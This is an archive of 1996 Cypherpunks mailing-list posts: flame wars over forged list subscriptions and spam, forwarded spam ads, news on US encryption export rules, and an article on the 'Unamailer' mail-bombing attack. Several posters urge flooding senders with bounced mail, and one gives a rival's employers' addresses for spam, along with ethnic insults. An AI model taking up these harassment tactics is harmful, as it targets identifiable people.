From: Carl Johnson <toto@sk.sympatico.ca>
Date: Fri, 27 Dec 1996 12:33:39 -0800 (PST)
To: admin@veracruz.net
Subject: Re: CypherRevenge
In-Reply-To: <19961227175000751.AAA253@monalisa>
Message-ID: <32C44F16.602F@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Adam Breaux wrote:
> Berating me does no
> good. I simply went about this in the way that is most effective. I
> asked the admin to correct this loophole in his system.

Adam,
  I have no idea how you are connected to plaidworks.com, but the one
previous post I have seen of yours indicates that you do not have
your head up your butt.
  As for Chuq, however, I have little sympathy. I find it amazing that
a web site of that magnitude has 'loopholes' that are a ten-year old
hacker's dream.
  Then he has the audacity to email my Postmaster, claiming that 'returning'
his mail is 'spamming'?  Which Subject: heading bothered him the most, the
one that said, "If you act like an idiot, we'll treat you like one?" (this
is a quote from plaidworks.com's home-page).

  Chuq's 'loophole' resulting in his mailsite spamming people with Tourette
Syndrome, like myself, are not his biggest problem.
  Whatever kindegarten child hacked his system to spam the CyberPunks 
conference, is not his biggest problem.
  In my estimation, the Evil One roaming his system freely (who is rumored to 
have originated the 'Ping of Death'), is probably his biggest problem.
The fact that some of plaidworks.com's 'postmaster' and 'webmaster' mail
is being routed directly to me, is probably a close second.

   If I receive further mail routed from plaidworks.com, I will continue
to return it.  However, if anyone wishes to inquire 'nicely' in regard to
plaidworks.com's 'hidden' problems, I would be happy to reply.

Sincerely,
  Toto
> If you disagree with my methods, I suggest that you email me directly
> instead of cluttering an already busy list with more junk-mail.
> 
> Thanks
> Adam Breaux
> 
> > Adam Breaux wrote:
> >
> > > And frankly, if someone's starting to use mailbots to spam, lists are
> > > in big trouble, because there are zillions of those out there. Most
> > > systems, for instance, have "info@xxxxx" addresses, all of which would
> > > do exactly what my mailbots are doing.
> >
> >   Well, I certainly hope that nobody uses this information to subscribe
> > others to a zillion lists.  Especially not the authors of such classics
> > as, "EASY MONEY!!!", "MAKE $$$ AT HOME", etc.
> >   I would hate for these people to be too busy to send me "IMPORTANT
> > INFORMATION ABOUT HOW 'YOU' CAN MAKE $$$ AT HOME, LICKING YOUR OWN
> > DICK!!!"
> >
> > Toto
> > p.s. - for a limited time--offer open to CypherPunks only--anyone
> > who sends me $20.00 will receive my special 'Secret Magic Chant',
> > which effectively blocks unwanted eMail.
> >   (This offer includes a clear Title to a bridge in the New York
> > City area--absolutely free!)
> >
> >
> ---
> Adam Breaux
> admin@veracruz.net
> http://www.veracruz.net       {Corporate Page }
> http://www.abyss.com          {Extracurricular}
> http://www.iso-america.com    {In Search Of...}
> 
> "Violence is a cruel world doing what it
> does best...break the habit...BE NICE" --- me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Fri, 27 Dec 1996 13:01:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Forged addresses
In-Reply-To: <v0300784eaee975274827@[139.167.130.248]>
Message-ID: <32C453F0.159C@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


> From: Chuq Von Rospach <chuqui@plaidworks.com> 
> Well, if I were trying to build lists of places to send spam mail from,
> this is one place I'd watch. That's why, if you don't mind, I won't go
> into details about my anti-spamming traps in public here. Except in
> generalities. I've learned to just assume that they're watching. Of
> course, with any luck they'll figure out I have full logging of the
> information needed to catch spammers, too, and not take chances with
> me, because I don't take prisoners...

   An informative post for the most part, but the above is a crock of shit.
The best that this dweeb can do is to write 'my' postmaster, accusing me
of 'spamming' him because I 'return' his own mail to him.
  He has a psycho roaming behind the scenes in his system, and he has
enough time to email people whining about people hitting the 'reply'
button when they get his spam.
  His time would be better served fixing his system so that ten-year old
kids can't hack it.

Toto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chuq Von Rospach <chuqui@plaidworks.com>
Date: Fri, 27 Dec 1996 15:26:37 -0800 (PST)
To: Carl Johnson <admin@veracruz.net
Subject: Re: CypherRevenge
In-Reply-To: <19961227175000751.AAA253@monalisa>
Message-ID: <v03010d45aeea08e7ba0c@[207.167.80.70]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:35 PM -0800 12/27/96, Carl Johnson wrote:
>  Then he has the audacity to email my Postmaster, claiming that 'returning'
>his mail is 'spamming'?  Which Subject: heading bothered him the most, the
>one that said, "If you act like an idiot, we'll treat you like one?" (this
>is a quote from plaidworks.com's home-page).

No, Carl, it was when you started spamming people that I accused you of
spamming. Or are you saying that the dozen or so spams (aimed primarily
at me and my site) that magically appeared today from *.sk.sympatico.ca
IP addresses at the same time as your latest set of abusive return mail
is a coincidence?

My loopholes aren't as large as you thought they were. They led quite
clearly back to you on this one.

chuq

--
           Chuq Von Rospach (chuq@solutions.apple.com) Software Gnome
       Apple Server Marketing Webmaster <http://www.solutions.apple.com/>

 Plaidworks Consulting (chuqui@plaidworks.com) <http://www.plaidworks.com/>
   (<http://www.plaidworks.com/hockey/> +-+ The home for Hockey on the net)

I got no name or number/ I just hand out the lumber.
But if I get a chance to play/ I'm going to show 'em.
		-- Stick Boy (The Hanson Brothers, SUDDEN DEATH)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Fri, 27 Dec 1996 13:53:22 -0800 (PST)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Forged addresses
In-Reply-To: <v0300784daee974a92a6d@[139.167.130.248]>
Message-ID: <32C460FA.4470@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


> From: Chuq Von Rospach <chuqui@plaidworks.com>
> Subject: Re: Forged addresses
> It's somewhat more work for me as moderator. It's a significantly
> reduced noise level for the list.

  The way it should have been in the first place?

> The days of laissez-faire administration are dead. The braindead, 
> the novice blunderer and the spammer have killed them.

  Not to mention laissez-faire administrators.

> So to cut out the Spammers and the folks who have no clue what their
> email is, my systems will be going to the
> confirmation-reply-before-subscribe setup.

   The way it should have been in the first place?

> Fairly sophisticated in
> some ways, but mostly, they knew when I wasn't looking and got around
> my traps. 

  I think maybe 'limped' around your traps would be a better description.
(It might have been blind quadraplegics)

>  in one case, they seem to have broken into a machine to send the spam attack, so it'll be tough...)

  Does this not 'ring a bell' that suggests how 'they' know when you're
"not looking?" (Buy a clue!)

> I'm going to make all lists moderated, and then extend moderation 
> priviledges to the "trusted" set of users.

  So that I won't get 1,000 spammed messages from your list?  What a
brilliant idea, setting up your system so that any idiot with a
Commodore 64 and 256k of ram can't use your system to spam the world.

> I don't log mailbot requests. Well, I will starting tomorrow...

  Like you should have from the beginning?

> And suggestions on how to continue to make mailbots available AND make
> them reasonably safe encouraged.

  The mailbot problems are 'warts'.  I think you need to check for
'cancer'.

Toto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Fri, 27 Dec 1996 14:27:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: Re: Repair " YOUR OWN " Credit !]
Message-ID: <32C46326.56CD@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: message/rfc822


To: cypherpunks@toad.com
Subject: Re: Repair " YOUR OWN " Credit !
From: John H West <jwest@eskimo.com>
Date: Thu, 26 Dec 1996 23:32:35 -0800
References: <199612270006.TAA21092@shell.flinet.com>
Sender: owner-cypherpunks@toad.com

Good folks who already have too much to read:

I encourage that everyone who gets spam like that which follows 
forward the original message BACK TO THE SENDER (several times) 
demanding to know "what the hell does this have to do with 
cryptology, spammer ??" attached to the * end * of their quoted 
text.  Hopefully, the response that they receive will be 
"overwhelming" :)

If (s)he has to search through every message looking for 
"good replies," then they may be less inclined to solicit for 
such a voluminous response in the future.

john
seattle

--

robroy@flinet.com wrote:
> 
> CREDIT REBUILDING OF AMERICA
>  * REBUILD YOUR OWN CREDIT*
> 
> PLEASE FORGIVE THIS E-MAIL INTRUSION BUT IF YOU CAN USE THIS SERVICE?   PLEASE KEEP
> READING!!
> 
>    Have you ever been turned down after you applied for a credit card,
> department store card, or a gas credit card, or that  new car  you have
> wanted?
>    The reason was probably because of something the creditor found on
> your credit report.
>    Thousands of people are denied credit every day because of something that
> appears on their credit report that  is not correct , OR they would like
> removed  from their credit report  for  good!!
>     There are many companies out there that can remove tems on your credit
> report but want to charge you any where from $300.00  to  $1,000.00 .
>    BE CAREFUL, most of these companies can't do anything
> to repair your credit that you can't do yourself  with my
> "CREDIT REPAIR PACKET".
>   Once I found out just how the " BIG " companies were doing this,
> I put all the information down on a  simple   twelve step process.
>      ** DO IT YOURSELF **  why pay their high prices to repair your
> credit, when you can do it yourself for only $19.95  plus 2.95  for S&H.
>       I spent over two years to perfect this process, and if followed to the
> letter, it  will  work!!!
>       HAVE the new car you want, the credit cards  you want.
> You don't have to wait SEVEN to TEN_YEARS for these items to be
>  taken off your credit reprot.
> DO IT YOUR SELF!! and feel  GOOD AGAIN!!
> Just send your check or money orker to:
> 
>  Robert C. Roy, Jr.
>  P.O. Box  1052
>  Delray Beach,  Fl.  33447-1052
> 
> I will send you by  return mail  the complete twelve step packet so you
> can get started  RIGHT NOW!!
> SEND NOW!!  due to the  unbelievable  responce for this packet
> the  introductory price of $19.95 (+) $2.95 S&H,  will not last long!
> HAVE A "GREAT DAY"!  &
> THANK YOU FOR YOUR TIME AND ORDER!!
> Timing is everything...  I'm making $2000+ per week
> in MLM after only 4 weeks.  I'll train you how.
> Be 1st in your area.  Call live conference call
> Mondays 9pm Eastern Time: 1-800-000-0000.
> 
> If you like what you hear and are serious about making
> money call Sandy 000-000-0000, or email you@youraddress.com

-- 

        /************************************************/
        /*****   DARE:  To Keep the CIA off Drugs   *****/
        /************************************************/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 27 Dec 1996 16:23:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Vulis strikes again?
In-Reply-To: <Pine.SUN.3.91.961227135514.4706A-100000@beast.brainlink.com>
Message-ID: <199612280022.QAA15873@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian writes:

> So tell us Vileus, how much does the NSA pay you to cause mayhem on this 
> list?  You certainly have lots of time on your hands, so when you aren't 
> masturbating to your own posts, you're typing away more spams.  So what's 
> the pay check of an NSA scumbag who does what you do for a living?

So now we are being attacked not only by the good doctor, but by the 
NSA as well?  Do they perhaps covet our advanced "Ebonics" technology?

The NSA will waste its time trying to disrupt the Cypherpunks list 
when winged monkeys fly out of my posterior.  It's not like the people
at the NSA don't have real work to do.  

Let's try not to look foolish and paranoid at the same time. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 27 Dec 1996 17:02:43 -0800 (PST)
To: Brad Dolan <shamrock@netcom.com>
Subject: Re: RUL_let
Message-ID: <199612280102.RAA25495@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 AM 12/27/96 -0500, Brad Dolan wrote:
>On Thu, 26 Dec 1996, Lucky Green wrote:
>
>> At 08:11 PM 12/26/96 -0500, John Young wrote:
>> >
>> >"New encryption export rules probably won't be issued until early 
>> >next week" 
>> >
>> >   Rules probably won't be issued until just a day or 2 before they 
>> >   go into effect on January 1, officials said Monday.
>> 
>> Good move on part of the USG. It will keep public discussion to a minimum.
>> 
> 
>An acquaintance of mine moved here from Germany after the war.
>She says that, from her family's perspective, the first clear sign
>that things were seriously going to hell was that Hitler and his
>friends started issuing proclamations, effective almost immediately,
>dictating something else you could or could not do.  Later, the
>proclamations were made during the night and were effective instantly.


Sounds like "government regulations" today, doesn't it!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Date: Fri, 27 Dec 1996 04:19:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Fast to Encrypt Decrypt....
Message-ID: <Pine.LNX.3.91.961227171449.739P-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain


Hey..
 By the way anyone can advice me the Encryption/Decryption Algorythm, which
 would give chip. text with different size, related to solt value or
 something..  i mean some function like size_of_Encrypted_file=H(solt)?

PS: better if it 'd be reversed algorythm..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 27 Dec 1996 14:32:13 -0800 (PST)
To: "Doktor Spam Dimi Vulis (spit)" <dlv@bwalk.dm.com>
Subject: Re: (Fwd) Re: Bad Idea
In-Reply-To: <8FsLZD130w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961227173200.7693D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Dec 1996, Dr. Spam Dimi Vulis (spit) wrote:

> Toto <toto@sk.sympatico.ca> writes:
> 
> > Adam Breaux wrote:
> > > As far as I can tell, cypherpunks wasn't subscribed to anything. What
> > > happened instead was someone started forging email in the name of the
> > > list's submission address to various of my mailbots, which simply send
> > > an informational e-mail back.
> >
> >   If cypherpunks wasn't subscribed to anything, then why did I get
> > 50 million messages about sports in my mailbox?
> 
> Because Ray Arachelian <ray@earthweb.com> is an inept forger and a liar.

Because Vulis you are full of shit as usual.  You are of the old school 
of do something bad and blame it on others.  Sorry, that shit doesn't 
fly.

Tell us Vulis, just how much does the NSA pay for your services to cause 
mayhem here?


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 27 Dec 1996 14:34:34 -0800 (PST)
To: "Dr.Dimitri Vulis NSA SPAMMER" <dlv@bwalk.dm.com>
Subject: Re: Vulis strikes again?
In-Reply-To: <39oLZD125w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961227135514.4706A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> Of course, idiot "cypher punks" Zach and Ray are lying again, as usual.

Let's see - since you came here, you posted many huge spams about various 
things, all of a sudden after your tiff with Tim, we started getting 
daily warnings about Tim May, followed more recently by daily warnings 
with ASCII art - in a recent message you responded to the question of 
ASCII art and thus proved your implication, the list has been getting 
much advertisement spam that starts wtih Fuck You Spams, and even more 
recently the list has been conveniently subscribed to several other 
lists, and now there is loop on the list caused by you.

I've been on this list since '93.  You've been here since what? early 
96?  You're the first and only person to be kicked off the list 
officially - even Detweiler left by his own accord. Patterns are very 
obvious.

So tell us Vileus, how much does the NSA pay you to cause mayhem on this 
list?  You certainly have lots of time on your hands, so when you aren't 
masturbating to your own posts, you're typing away more spams.  So what's 
the pay check of an NSA scumbag who does what you do for a living?

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pSIONIC dAMAGE <zerofaith@geocities.com>
Date: Fri, 27 Dec 1996 17:43:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: interesting
Message-ID: <199612280142.RAA29840@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


does anyone remember 2001: A Space Odyssey? Remember the computer's name.
HAL
Then Think about the letter that follows each in the alphabet. Arthur Clarke
said it was just a coincidence...
Hmm.
pSIONIC dAMAGE
Zer0 Faith Inc.
www.geocities.com/SiliconValley/Heights/2608
H/P/A/V/C ANTIVIRUS/COUNTERSECURITY
"ONLY THE ELITE SURVIVE!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kalliste@aci.net (J. Orlin Grabbe)
Date: Fri, 27 Dec 1996 18:04:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: New Crypto Export Rules Monday
Message-ID: <32C47DE7.6AD8@aci.net>
MIME-Version: 1.0
Content-Type: text/plain



27-DEC-1996 18:59
U.S. export encryption rules to be published Monday 
 
    By Aaron Pressman 

    WASHINGTON, Dec 27 (Reuter) - The Commerce 
Department will issue final rules on Dec. 30 to implement 
its new policy on export of computer encoding products, 
but the proposal is unlikely to mollify the software 
industry and privacy advocates who objected to a draft 
version. 
 
    Some changes were made in the final rules, available 
Friday at a government printing office, from the earlier 
draft. But the bulk of the proposal remains the same, 
including portions strongly criticized by the software 
industry that applied to real-time communications. 

    Commerce undersecretary William Reinsch had said 
two weeks ago that the draft rules would be modestly 
revised, but warned that some objections could not 
be addressed. 

    Under the previous rules dating from the Cold war, the 
administration severely limited the export of products 
containing encryption, programs that use mathematical 
formulas to scramble information and render it unreadable 
without a password or software "key." 

    In the past, products could be exported using "keys" as 
long as 40 digital bits, a string of forty ones and zeros. 
But as the speed of computers has grown, 40-bit keys 
have become easy to crack and longer keys have come 
into general use. 

    At the same time, with the growth of the Internet and 
online commerce, demand for encryption-capable 
products is growing worldwide. Coded messages can 
keep a business' e-mail confidential or protect a 
consumer's credit card number sent on the Internet. 

    The Commerce Department rules were intended as a 
compromise, allowing U.S. companies to compete in the 
encryption market while protecting the interests of 
law enforcement officials. 

    The policy relies on so-called key recovery features 
which allow government officials to decode encrypted 
messages when acting under proper legal authority. 
 
    Under the policy to be issued Monday, products 
containing key recovery features will be eligible for 
export after a one-time review. 

    Software firms had hoped the key recovery exception 
would only apply to stored data, like a document on a 
hard drive. But the final rules, like the draft rules, also 
require key recovery for real-time data transamission such 
as coded phone calls. 

    Non-key recovery software with keys of up to 56 bits 
will be exportable under six-month, renewable licenses 
until the end of 1998, but only if the manufacturer 
commits to producing software with key recovery by then. 

    Some companies had complained that the government 
was asking for too much information about their future 
plans, but the final rules still require submission of 
detailed plans and committments. 

    All other encryption products, such as state-of-the art 
128-bit software without key recovery features, would 
continue to be treated as munitions. Such products include 
ordinary e-mail programs and even the recently 
introduced set-top box for surfing the Internet with a 
television. 

    The rules deleted a draft provision allowing keys to be 
stored with a recovery agent located outside of the United 
States. 

    The final rules also made clear that an applicant's 
public support of the administration's policy would not be 
a factor in export license decisions. Rather, helping build 
the necessary infrastructure would be a factor, the final 
rules said. 

    A criteria listed as "public support for a key 
management infrastructure," was changed to "or other 
support for the key management infrastructure."

http://www.aci.net/kalliste/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 27 Dec 1996 18:18:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: RUL_let
Message-ID: <v02140b02aeea342f6e23@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Jim Bell wrote:
>>On Thu, 26 Dec 1996, Lucky Green wrote:
>>
>>> At 08:11 PM 12/26/96 -0500, John Young wrote:
>>> >
>>> >"New encryption export rules probably won't be issued until early
>>> >next week"
>>> >
>>> >   Rules probably won't be issued until just a day or 2 before they
>>> >   go into effect on January 1, officials said Monday.
>>>
>>> Good move on part of the USG. It will keep public discussion to a minimum.
>>>
>>
>>An acquaintance of mine moved here from Germany after the war.
>>She says that, from her family's perspective, the first clear sign
>>that things were seriously going to hell was that Hitler and his
>>friends started issuing proclamations, effective almost immediately,
>>dictating something else you could or could not do.  Later, the
>>proclamations were made during the night and were effective instantly.
>
>
>Sounds like "government regulations" today, doesn't it!

Or the bogus vote taken recently in Korea's legislature when the ruling
party held a "secret" vote in the early morning hours (so the opposition
parties would be present) to pass contentious labor laws.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 27 Dec 1996 16:00:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ray Arachelian's typical Armenian spam and sabotage
In-Reply-To: <Pine.SUN.3.91.961227122510.2156A-100000@beast.brainlink.com>
Message-ID: <01cmZD131w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> On Fri, 27 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > Someone should unsubscrive <crypto@uhf.wireless.net> -- apparently Ray's
> > tentacle that sends whatever it receives back to "cypher punks" (spit).
...
>
> Seeing how this is in California - it must be one of your friends Vulis,
> or one of your tentacles.

Ray "Arsenic" Arachelian is lying again, as usual. California is a hotbed
of ASALA/SDPA terrorirm. Please auto-forward all spam to Ray's employers:

jack@earthweb.com murray@earthweb.com nova@earthweb.com

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 27 Dec 1996 19:26:17 -0800 (PST)
To: "Vladimir Z. Nuri" <omega@bigeasy.com>
Subject: Re: cryptoanarchy
Message-ID: <199612280325.TAA05468@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:18 PM 12/26/96 -0800, Vladimir Z. Nuri wrote:
>omegaman taunts me to rant about cryptoanarchy. frankly I find
>it tiresome given its originator repeatedly refuses to answer
>point-blank questions about key aspects of it.


maybe you just don't like the answers?


> lacking this, I 
>fail to take it seriously, given nobody else has a similar idea.

You must be kidding.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 27 Dec 1996 16:50:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Counting the lies in Ray Arachelian's spam
In-Reply-To: <Pine.SUN.3.91.961227135514.4706A-100000@beast.brainlink.com>
Message-ID: <yJFmZD135w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> On Fri, 27 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > Of course, idiot "cypher punks" Zach and Ray are lying again, as usual.
>
> Let's see - since you came here, you posted many huge spams about various
> things, all of a sudden after your tiff with Tim, we started getting
       Lie #1.
> daily warnings about Tim May, followed more recently by daily warnings
                     Lie #2                                 Lie #3
> with ASCII art - in a recent message you responded to the question of
                                                  Lie #4
> ASCII art and thus proved your implication, the list has been getting
                    Lie #5
> much advertisement spam that starts wtih Fuck You Spams, and even more
   has nothing to do with me
> recently the list has been conveniently subscribed to several other
> lists, and now there is loop on the list caused by you.
                                           Lie #6

> I've been on this list since '93.  You've been here since what? early
> 96?  You're the first and only person to be kicked off the list
  Lie #7                      probably a lie
> officially - even Detweiler left by his own accord. Patterns are very
> obvious.
 Lie #8

> So tell us Vileus, how much does the NSA pay you to cause mayhem on this
                                          Lie #9
> list?  You certainly have lots of time on your hands, so when you aren't
                          Lie #10
> masturbating to your own posts, you're typing away more spams.  So what's
 Lie #11                                  Lie #12
> the pay check of an NSA scumbag who does what you do for a living?

What's the paycheck of the Earthweb scumbag who spams for a living?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ygarcia@gte.net
Date: Fri, 27 Dec 1996 16:37:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Create all the Prospects You Want!  Software on Sale!
Message-ID: <199612280049.TAA00825@server.kcii.com>
MIME-Version: 1.0
Content-Type: text/plain


Suck_My_Big_Juicy_Cock,

I thought this might interest you. 

DON'T PAY ANYBODY FOR E-MAIL NAMES!!  You can extract
your own with our software.


No matter what you are marketing, you need prospects. 
Our system can allow you to reach all the prospecst you can
handle.  And even more exciting is you don't have to BUY addresses, our software extracts
them from anywhere on the internet!!

I presently have over 400 responses in my mail folder, and every few
minutes or sooner I receive more responses. 

Find out why we are all so excited about our results. Send a blank
e-mail to star-yvonnegarcia-netcontact@nicers.com and you will have
the information sent to you.

NO PROSPECTS = NO SALES!!

Have a great day,
Yvonne Garcia

P.S.  Also FREE ELECTRONIC MARKETING TRAINING AND SUPPORT GROUP AVAILABLE.
AND FREE AUTORESPONDERS!  This is YOUR KEY to successful Internet Marketing!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 27 Dec 1996 18:27:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: FYI Unamailer
Message-ID: <v0300786eaeea2f31fe09@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Fri, 27 Dec 1996 06:33:04 +0000
From: Alastair Sweeny <asweeny@sonetis.com>
Subject: FYI Unamailer
To: listmom-talk@skyweyr.com
Mime-Version: 1.0
Precedence: Bulk
Reply-To: listmom-talk@skyweyr.com

Date: Thu Dec 26 18:33:49 1996
From: brock@well.com ("Brock N. Meeks")
Subject: CWD--Unamailer Strikes on Christmas
To: cwd-l@cyberwerks.com
Reply-To: brock@well.com


CyberWire Dispatch / Copyright (c)1996/ December 26, 1996 /

Jacking in from the "Spam in the Stocking" Port:

Unamailer Delivers Christmas Grief

by Lewis Z. Koch
Special to CyberWire Dispatch

"johnny xchaotic," also known as the "Unamailer," is back, and
twenty-one individuals -- many of whom are deeply involved in the
Internet ---journalists, the heads of computer companies such as
Mircrosoft, politicians, and religious figures -- received a "denial
of
service" Christmas present they wished they didn't have.

johnny, and possible friends of johnny, effectively halted these
individuals' ability to send and receive E-mail, a denial of service
attack which may take days to restore.

Among those hit were prominent journalists including magazine
columnist
joel snyder, because, in xchaotic's words,"your last article in
'Internet World' places all the blame of my actions on an innocent
person."  Also hit was the magazine's editor Michael Neubarth because
of
his failure to "apologize" for what were termed journalistic errors.''

Political figures, such as former Presidential candidate Pat Buchanan
and U.S. Senate wannabe David Duke, also were targets.  Religious
figures such as Pat Robertson and Billy Graham were subject to e-mail
bombings, as were members of the Church of Scientology and members of
the KKK.

Mircosoft's Billl Gates, several people from the cable channel MTV
also
were among those apparently attacked.  Others hit include Carolyn
Meinel
who operates a "Happy Hacker" mailing list, the Klu Klux Klan, MTV and
the Nazi party.

All told, 21  individuals were hit, some, like Gates for the second
time.  This is the second time in six months that the work of one or
more individuals has exploited relatively simple vulnerabilities in
Internet e-mail lists.

The first attack, in August, targeted more than 40 individuals,
including Bill Clinton and Newt Gingrich and brought a torrent of
complaints from the people who found their names sent as subscribers
to
some 3,000 E- mail lists. By comparison to the Christmas attack, even
that relatively modest attack sent enough e-mail to the targeted
recipients that it effectively halted their computers' ability to
process the messages.

This attack is estimated to involve 10,139 listservs groups,  3 times
greater than the one that took place in the summer, also at xchaotic's
instigation. If each mailing list in this attack sent the targeted
individuals just a modest 10 letters to the subscribers' computer
those
individuals would receive more than 100,000 messages. If each listing
system sent 100 messages -- and many do -- then the total messages
could
tally 1,000,000.

Once again, johnny xchaotic has offered an "open letter," given to
this
reporter before it was scheduled to be posted throughout the Internet,
as a way to explain the reasons behind the attack. He also taunted the
FBI, telling the agency not to "waste tax dollars trying to track me"
because "there are a lot more dangerous people out there you should be
concentrating on."  (The complete letter will be released shortly to
the
Net by johnny.)

The open letter, and the information outlining the e-mail blast, were
give to this reporter as the "attack" was concluding. The attack began
the evening of December 24 just before midnight and took four hours,
eight minutes and twenty-nine seconds.

"They [listserv-based mailing lists] could stop this kind of attack
tomorrow," one source close to johnny said, "if they only took the
simplest of precautions --like authentication."    Authentication is a
means by which the listing system, instead of agreeing to the
''subscription'' and then automatically forwarding tens or hundreds of
letters to the subscriber, would first ask if the person really wanted
to subscribe. This ''verification'' could come as an electronic mail
message to the subscriber asking for confirmation.

If this process had been in place, someone subject to an E-mail denial
of service attack would only receive one letter from each list-- that
one being the authentication confirmation query -- do you really want
this E-mail -- before sending on 10 or 100 messages.

"They're either too lazy or too dumb to do that -- so they have to pay
a
price," this source said, indicating that the attacks would continue
until the administrators "get it right," indicating that johnny and
his
friends want to pressure administrators into authentication.

In these kinds of instances, individuals who have been hit wind up
quickly canceling their e-mail accounts, thus passing the
responsibility
for canceling the "subscription" back to the list administrator. Many
suspect the authentication-confirmation process is viewed by listserv
systems administrators as an inconvenience and confusing to the
subscriber and  so, they just avoid it.

The attack, however, may be a violation of federal law, punishable by
up
to  five years in prison, or $250,000.00 in fines or both.  While
there
are techniques for tracing this kind of attack when there is advance
warning, knowledgeable sources say that this kind of attack is very
difficult to trace once the attack has occurred.

johnny xchaotic has been labeled a 'Net terrorist,' which, according
to
some, debases the meaning of the word "terrorism."  No one knows who
johnny is.  He was misidentified earlier by Internet Underground
magazine as a well known hacker who calls himself "se7en." This
identification proved false.

One person close to "johnny xchaotic" said the FBI and Secret Service
had been contacted about the illegality of this kind of hack but said
they had no interest in this kind of "Net" attack.  "We have bigger
fish
to fry," was the response from law enforcement officials, according to
this person.  This attitude was confirmed by a former federal
prosecutor
who said the few federal investigators who understood computers and
the
